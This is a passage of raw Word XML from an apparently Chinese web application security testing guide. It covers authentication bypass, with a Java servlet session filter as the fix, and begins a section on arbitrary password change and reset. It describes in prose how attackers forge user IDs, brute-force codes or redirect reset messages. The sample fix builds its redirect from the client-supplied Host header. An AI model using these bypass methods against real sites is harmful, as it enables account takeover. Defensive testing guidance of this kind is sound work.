          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等实施恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE1681" w14:textId="77777777" w:rsidR="000B26CB" w:rsidRPr="00C02265" w:rsidRDefault="000B26CB" w:rsidP="000B26CB">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A51908" w14:textId="01D2E4F8" w:rsidR="000B26CB" w:rsidRPr="009E052C" w:rsidRDefault="000B26CB" w:rsidP="000B26CB">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00C02265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0056282D" w:rsidRPr="0056282D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证模式可绕过，不登录即可通过</w:t>
      </w:r>
      <w:r w:rsidR="0056282D" w:rsidRPr="0056282D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidR="0056282D" w:rsidRPr="0056282D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他方式访问登陆后页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D254C" w14:textId="03774B30" w:rsidR="009876BB" w:rsidRPr="009E052C" w:rsidRDefault="00B00111" w:rsidP="009E052C">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="009876BB" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的修复方法：在系统中，加入用户身份认证机制或者</w:t>
      </w:r>
      <w:r w:rsidR="009876BB" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tonken</w:t>
      </w:r>
      <w:r w:rsidR="009876BB" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证，防止可被直接通过连接就可访问到用户的功能进行操作，简而言之，一定对系统重要功能点增加权限控制，对用户操作进行合法性验证，下列为针对常见的</w:t>
      </w:r>
      <w:r w:rsidR="009876BB" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidR="009876BB" w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言编写的网站的安全修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC7714" w14:textId="77777777" w:rsidR="009876BB" w:rsidRPr="009E052C" w:rsidRDefault="009876BB" w:rsidP="009E052C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤器技术，对</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/pages</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下所有</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行登录状态检查，通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.getAttribute()</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法从</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中获取登录成功时存入</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的身份标识，判断客户端传递过来的身份标识是否与</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中保存的一致，不一致则跳转到登录页面。关键代码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415DF" w:rsidRPr="009E052C" w14:paraId="13241A40" w14:textId="77777777" w:rsidTr="007740FC">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D10306"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从</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>session</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>里取的用户名信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6DCA6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String username = (String) session.getAttribute("userID");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FBC237"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getAttribute</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中变量根据实际变量传入。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4556932B"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判断如果没有取到用户信息</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>就跳转到登陆页面</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2558B4A3"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if ((username == null) || "".equals(username)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="571686C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跳转到登陆页面</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163DC85B"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res.sendRedirect("http://" + req.getHeader("Host") +"/login_oa.jsp");} </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B3BFDC9"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else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2783E0BD"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已经登陆</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>继续此次请求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0951688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chain.doFilter(req, res); }}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B0FD1DA" w14:textId="77777777" w:rsidR="009876BB" w:rsidRPr="009E052C" w:rsidRDefault="009876BB" w:rsidP="009E052C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行权限判断，以下代码为过滤器程序，通过会话获取用户身份信息，进行权限判</w:t>
      </w:r>
      <w:r w:rsidRPr="009E052C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>断等操作：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="823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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F213FF" w:rsidRPr="009E052C" w14:paraId="0F182CAF" w14:textId="77777777" w:rsidTr="00AE1DC3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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F298C5"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在配置文件中设置过滤器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DDBB214"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gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="204B946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lt;filter-name&gt;SessionFilter&lt;/filter-name&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E8976C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class&gt;com.nsfocus.frame.filter.SessionFilter&lt;/filter-class&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A9DB88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gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBE15C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mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A552B6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name&gt;SessionFilter&lt;/filter-name&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106E3721"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url-pattern&gt;/pages/*&lt;/url-pattern&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F45AF5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mapping&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F65CD2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gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F7CB59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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E508E25"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后台过滤程序</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="036A052D"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public void doFilter(ServletRequest request, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155539C3"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ServletResponse response,FilterChain chain) throws </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="019599F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IOException, ServletException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6340BEC5"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HttpServletRequest req = (HttpServletRequest) request;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E3793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HttpServletResponse res = (HttpServletResponse) response;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42AD01C6"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HttpSession session = req.getSession(true);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0229F2E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从</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>session</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>里取的用户名信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E57757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String username = (String) session.getAttribute("userID");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C40F90C"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getAttribute</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中变量根据实际变量传入。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="039F040D"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判断如果没有取到用户信息</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>就跳转到登陆页面</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="066B0D2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if ((username == null) || "".equals(username)) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E4BEB3"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跳转到登陆页面</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0974CCF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res.sendRedirect("http://" + req.getHeader("Host") +"/login_oa.jsp");} </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60E7135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else {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BDCD52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已经登陆</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="009E052C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>继续此次请求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E93081"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chain.doFilter(req, res);      }   }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F66C59"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lastRenderedPageBreak/>
              <w:t>public void destroy() {   }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA787F9"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F86515F" w14:textId="2ADBF300" w:rsidR="00B00111" w:rsidRPr="00F757E4" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑"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66CE9F20" w14:textId="7A08B3DD" w:rsidR="00AF5A8B" w:rsidRPr="00AD537C" w:rsidRDefault="00AF5A8B" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc498434544"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限篡改</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="1FBB6D09" w14:textId="37608082" w:rsidR="00AF5A8B" w:rsidRPr="00F757E4" w:rsidRDefault="00AF5A8B" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc498434545"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任意用户密码修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="26A9A8A4" w14:textId="2BEFE6EE" w:rsidR="00AF5A8B"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00367C25" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过篡改用户名或</w:t>
      </w:r>
      <w:r w:rsidR="00367C25" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidR="00302C9A" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、暴力破解验证码</w:t>
      </w:r>
      <w:r w:rsidR="00367C25" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等方式</w:t>
      </w:r>
      <w:r w:rsidR="0077642B" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="001269B8" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00367C25" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置任意账户的密码</w:t>
      </w:r>
      <w:r w:rsidR="00A50B7B" w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321BE3A3" w14:textId="77777777" w:rsidR="00D7151A"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD97D0" w14:textId="72F8A566" w:rsidR="00B02C46" w:rsidRPr="004D55A1" w:rsidRDefault="00B02C46" w:rsidP="004D55A1">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码修改的步骤一般是先校验用户原始密码是否正确，再让用户输入新密码。修改密码机制绕过方式大概有以下三种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0115E1E7" w14:textId="77777777" w:rsidR="00B02C46" w:rsidRPr="004D55A1" w:rsidRDefault="00B02C46" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果输入新密码的接口可以直接访问，那么在未知原始密码的的情况下即可直接修改密码，通常知道了他人的用户名即可任意修改他人的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F881E81" w14:textId="77777777" w:rsidR="00B02C46" w:rsidRPr="004D55A1" w:rsidRDefault="00B02C46" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果系统</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>未校验修改密码的用户身份</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么在提交修改密码请求时，攻击者通过输入密码，将用户名或者用户</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为其他人的，即可成功修改他人的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F75D7C" w14:textId="44237215" w:rsidR="00B02C46" w:rsidRPr="004D55A1" w:rsidRDefault="00B02C46" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当修改密码时系统需要电子邮件或者手机短信确认，而应用程序未校验用户输入的邮箱和手机号，那么攻击者通过填写自己的邮箱或手机号接收修改密码的链接和验证码，以此修改他人的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA3685" w14:textId="77777777" w:rsidR="00307FF6" w:rsidRPr="004D55A1" w:rsidRDefault="00307FF6" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="78"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:t>密码重置机制绕过攻击方式主要有以下两种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2EBA85" w14:textId="77777777" w:rsidR="00307FF6" w:rsidRPr="004D55A1" w:rsidRDefault="00307FF6" w:rsidP="004D55A1">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="0" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
          <w:snapToGrid w:val="0"/>
        </w:rPr>
        <w:t>通过正常手段获取重置密码的链接，猜解链接的组成结构和内容（如用户名或者时间戳的</w:t>
      </w:r>
      <w:r w:rsidRPr="004D55A1">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
